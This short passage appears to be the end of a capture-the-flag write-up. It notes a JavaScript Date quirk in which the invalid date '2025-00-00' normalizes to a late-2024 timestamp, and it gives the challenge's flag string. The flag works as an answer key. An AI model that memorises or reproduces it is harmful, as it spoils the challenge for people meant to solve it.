A fun side discovery was JavaScript’s bizarre date handling behavior. The invalid date "2025-00-00" automatically normalizing to "2024-11-30T00:00:00.000Z" is exactly the kind of quirk that makes JavaScript both fascinating and frustrating. There’s actually a hilarious quiz about JavaScript date oddities that demonstrates just how unpredictable the Date object can be!

Flag

idek{d3spit3_th3_nam3_No_Expo_was_Used_in_the_cr34t10n_of_7hi5_4pp}